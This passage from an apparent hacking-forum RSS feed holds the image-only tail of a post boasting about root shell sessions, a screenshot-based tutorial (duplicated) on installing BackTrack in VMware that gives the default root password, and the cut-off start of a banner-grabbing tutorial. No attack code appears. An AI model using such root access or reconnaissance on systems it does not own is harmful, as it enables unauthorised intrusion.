<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/Jr2brcM.png" border="0" alt="[Image: Jr2brcM.png]" /></div></div><span style="font-weight: bold;"><span style="color: #FF6347;">Boom</span></span>~!!!<br />
We can see shell sessions <img src="images/smilies/dance3.gif" style="vertical-align: middle;" border="0" alt="Dance" title="Dance" /><br />
type around and play with root <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /><br />
<br />
Regards<br />
<span style="color: #98FB98;">Mr.Geek</span>@<span style="color: #FF6347;">HC</span><span style="color: #32CD32;">:~#</span> <span style="color: #00BFFF;">logout</span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How To install Backtrack ON a Virtual Machine]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-How-To-install-Backtrack-ON-a-Virtual-Machine</link>
			<pubDate>Tue, 11 Jun 2013 06:40:28 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-How-To-install-Backtrack-ON-a-Virtual-Machine</guid>
			<description><![CDATA[<span style="font-size: x-large;"><span style="color: #32CD32;"><span style="font-weight: bold;">I am using Vmware workstation 9 in this Tutorial</span></span><br />
<br />
<span style="color: #32CD32;">Step 1:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/JtIgx9b.png" border="0" alt="[Image: JtIgx9b.png]" /></div></div><span style="color: #00BFFF;">Click on File &gt; Create a New Virtual Machine</span><br />
<span style="color: #32CD32;">Step 2:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/MPnkvfY.png" border="0" alt="[Image: MPnkvfY.png]" /></div></div><span style="color: #00BFFF;">Select Typical and click next</span><br />
<span style="color: #32CD32;">Step 3:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/u2ADQ41.png" border="0" alt="[Image: u2ADQ41.png]" /></div></div><span style="color: #00BFFF;">Select Installer Disc Image and add the backtrack iso file that you have downloaded</span><br />
<span style="color: #32CD32;">Step 4:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/Bn0VmmA.png" border="0" alt="[Image: Bn0VmmA.png]" /></div></div><span style="color: #00BFFF;">Select other as shown in Image below</span><br />
<span style="color: #32CD32;">Step 5:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/0VKNwxY.png" border="0" alt="[Image: 0VKNwxY.png]" /></div></div><span style="color: #00BFFF;">Add a name to your Virtual machine and Location to it</span><br />
<span style="color: #32CD32;">Step 6:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/MpbJ6Wq.png" border="0" alt="[Image: MpbJ6Wq.png]" /></div></div><span style="color: #00BFFF;">Specify the hDD size and use split hdd into multiple files options</span><br />
<span style="color: #32CD32;">Step 7:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/CwBWSL7.png" border="0" alt="[Image: CwBWSL7.png]" /></div></div><span style="color: #00BFFF;">In the Image below the ram is 256mb you can increase it or decrease it if you want. to make that changes you need to </span><br />
<span style="color: #32CD32;">Step 8:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/A7WOj8p.png" border="0" alt="[Image: A7WOj8p.png]" /></div></div><span style="color: #00BFFF;">I am changing the ram to 1 GB</span><br />
<span style="color: #32CD32;">Step 9:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/miJltAL.png" border="0" alt="[Image: miJltAL.png]" /></div></div><span style="color: #00BFFF;">Click Finish and check the hardware again</span><br />
<span style="color: #32CD32;">Step 10:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/sQUFYsd.png" border="0" alt="[Image: sQUFYsd.png]" /></div></div><span style="color: #00BFFF;">The set up of the Virtual machine is complete now we need to install backtrack in that VM.<br />
Click on</span> <span style="color: #C71585;">power on the machine</span> <br />
<span style="color: #32CD32;">Step 11:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/hLI3NBV.png" border="0" alt="[Image: hLI3NBV.png]" /></div></div><span style="color: #00BFFF;">When the following image appears press enter</span><br />
<span style="color: #32CD32;">Step 12:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/mUTVJJu.png" border="0" alt="[Image: mUTVJJu.png]" /></div></div><span style="color: #00BFFF;">Select Default Boot text mode and Press enter</span><br />
<span style="color: #32CD32;">Step 13:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/aCsemVq.png" border="0" alt="[Image: aCsemVq.png]" /></div></div><span style="color: #00BFFF;">Wait until the following image appears</span><br />
<span style="color: #32CD32;">Step 14:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/sgLJOnu.png" border="0" alt="[Image: sgLJOnu.png]" /></div></div><span style="color: #00BFFF;">Type in "startx" to load the GUI</span><br />
<span style="color: #32CD32;">Step 15</span>:<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/4f84ltr.png" border="0" alt="[Image: 4f84ltr.png]" /></div></div><span style="color: #00BFFF;">Wait for backtrack to load, Click on install backtrack icon</span><br />
<span style="color: #32CD32;">Step 16:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/pZzT2d7.png" border="0" alt="[Image: pZzT2d7.png]" /></div></div><span style="color: #00BFFF;">A following type of window will appear click on Forward</span><br />
<span style="color: #32CD32;">Step 17:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/Pitr0C0.png" border="0" alt="[Image: Pitr0C0.png]" /></div></div><span style="color: #00BFFF;">Wait for the system to find your time zone and then click Forward</span><br />
<span style="color: #32CD32;">Step 18:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/T5RKBFN.png" border="0" alt="[Image: T5RKBFN.png]" /></div></div><span style="color: #00BFFF;">Select your comfortable type of keyboard layout.Click Forward</span><br />
<span style="color: #32CD32;">Step 19:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/bfT59Fp.png" border="0" alt="[Image: bfT59Fp.png]" /></div></div><span style="color: #00BFFF;">I assume that you are new to linux and advise you not to do the partition manually select erase entire disk and use it click on Forward and then in the next window click on install</span><br />
<span style="color: #32CD32;">Step 20:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/y35K8Sg.png" border="0" alt="[Image: y35K8Sg.png]" /></div></div><span style="color: #00BFFF;">Wait for the Process to complete.</span><br />
<span style="color: #32CD32;">Step 21:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/sPvePZy.png" border="0" alt="[Image: sPvePZy.png]" /></div></div>
<span style="color: #00BFFF;">Wait for the process to complete, It will ask for a reboot do it.<br />
When booted again it will ask for username and password the default username is "<span style="color: #C71585;">root</span>" and pass is "<span style="color: #C71585;">toor</span>".<br />
<br />
Then use "<span style="color: #C71585;">startx</span>" to load GUI.<br />
</span><br />
<br />
</span>]]></description>
			<content:encoded><![CDATA[<span style="font-size: x-large;"><span style="color: #32CD32;"><span style="font-weight: bold;">I am using Vmware workstation 9 in this Tutorial</span></span><br />
<br />
<span style="color: #32CD32;">Step 1:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/JtIgx9b.png" border="0" alt="[Image: JtIgx9b.png]" /></div></div><span style="color: #00BFFF;">Click on File &gt; Create a New Virtual Machine</span><br />
<span style="color: #32CD32;">Step 2:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/MPnkvfY.png" border="0" alt="[Image: MPnkvfY.png]" /></div></div><span style="color: #00BFFF;">Select Typical and click next</span><br />
<span style="color: #32CD32;">Step 3:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/u2ADQ41.png" border="0" alt="[Image: u2ADQ41.png]" /></div></div><span style="color: #00BFFF;">Select Installer Disc Image and add the backtrack iso file that you have downloaded</span><br />
<span style="color: #32CD32;">Step 4:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/Bn0VmmA.png" border="0" alt="[Image: Bn0VmmA.png]" /></div></div><span style="color: #00BFFF;">Select other as shown in Image below</span><br />
<span style="color: #32CD32;">Step 5:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/0VKNwxY.png" border="0" alt="[Image: 0VKNwxY.png]" /></div></div><span style="color: #00BFFF;">Add a name to your Virtual machine and Location to it</span><br />
<span style="color: #32CD32;">Step 6:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/MpbJ6Wq.png" border="0" alt="[Image: MpbJ6Wq.png]" /></div></div><span style="color: #00BFFF;">Specify the hDD size and use split hdd into multiple files options</span><br />
<span style="color: #32CD32;">Step 7:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/CwBWSL7.png" border="0" alt="[Image: CwBWSL7.png]" /></div></div><span style="color: #00BFFF;">In the Image below the ram is 256mb you can increase it or decrease it if you want. to make that changes you need to </span><br />
<span style="color: #32CD32;">Step 8:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/A7WOj8p.png" border="0" alt="[Image: A7WOj8p.png]" /></div></div><span style="color: #00BFFF;">I am changing the ram to 1 GB</span><br />
<span style="color: #32CD32;">Step 9:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/miJltAL.png" border="0" alt="[Image: miJltAL.png]" /></div></div><span style="color: #00BFFF;">Click Finish and check the hardware again</span><br />
<span style="color: #32CD32;">Step 10:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/sQUFYsd.png" border="0" alt="[Image: sQUFYsd.png]" /></div></div><span style="color: #00BFFF;">The set up of the Virtual machine is complete now we need to install backtrack in that VM.<br />
Click on</span> <span style="color: #C71585;">power on the machine</span> <br />
<span style="color: #32CD32;">Step 11:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/hLI3NBV.png" border="0" alt="[Image: hLI3NBV.png]" /></div></div><span style="color: #00BFFF;">When the following image appears press enter</span><br />
<span style="color: #32CD32;">Step 12:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/mUTVJJu.png" border="0" alt="[Image: mUTVJJu.png]" /></div></div><span style="color: #00BFFF;">Select Default Boot text mode and Press enter</span><br />
<span style="color: #32CD32;">Step 13:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/aCsemVq.png" border="0" alt="[Image: aCsemVq.png]" /></div></div><span style="color: #00BFFF;">Wait until the following image appears</span><br />
<span style="color: #32CD32;">Step 14:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/sgLJOnu.png" border="0" alt="[Image: sgLJOnu.png]" /></div></div><span style="color: #00BFFF;">Type in "startx" to load the GUI</span><br />
<span style="color: #32CD32;">Step 15</span>:<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/4f84ltr.png" border="0" alt="[Image: 4f84ltr.png]" /></div></div><span style="color: #00BFFF;">Wait for backtrack to load, Click on install backtrack icon</span><br />
<span style="color: #32CD32;">Step 16:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/pZzT2d7.png" border="0" alt="[Image: pZzT2d7.png]" /></div></div><span style="color: #00BFFF;">A following type of window will appear click on Forward</span><br />
<span style="color: #32CD32;">Step 17:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/Pitr0C0.png" border="0" alt="[Image: Pitr0C0.png]" /></div></div><span style="color: #00BFFF;">Wait for the system to find your time zone and then click Forward</span><br />
<span style="color: #32CD32;">Step 18:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/T5RKBFN.png" border="0" alt="[Image: T5RKBFN.png]" /></div></div><span style="color: #00BFFF;">Select your comfortable type of keyboard layout.Click Forward</span><br />
<span style="color: #32CD32;">Step 19:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/bfT59Fp.png" border="0" alt="[Image: bfT59Fp.png]" /></div></div><span style="color: #00BFFF;">I assume that you are new to linux and advise you not to do the partition manually select erase entire disk and use it click on Forward and then in the next window click on install</span><br />
<span style="color: #32CD32;">Step 20:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/y35K8Sg.png" border="0" alt="[Image: y35K8Sg.png]" /></div></div><span style="color: #00BFFF;">Wait for the Process to complete.</span><br />
<span style="color: #32CD32;">Step 21:</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<img src="http://i.imgur.com/sPvePZy.png" border="0" alt="[Image: sPvePZy.png]" /></div></div>
<span style="color: #00BFFF;">Wait for the process to complete, It will ask for a reboot do it.<br />
When booted again it will ask for username and password the default username is "<span style="color: #C71585;">root</span>" and pass is "<span style="color: #C71585;">toor</span>".<br />
<br />
Then use "<span style="color: #C71585;">startx</span>" to load GUI.<br />
</span><br />
<br />
</span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Banner Grabbing(FTP, SSH, and SMTP)]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Banner-Grabbing-FTP-SSH-and-SMTP</link>
			<pubDate>Tue, 11 Jun 2013 05:50:29 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Banner-Grabbing-FTP-SSH-and-SMTP</guid>
			<description><![CDATA[*Not sure if this has been posted before but with a quick search I didn't find anything. This is a post from another forum but is my work.<br />
<br />
<span style="font-weight: bold;"><span style="font-size: xx-large;">Banner Grabbing</span></span><br />
<br />
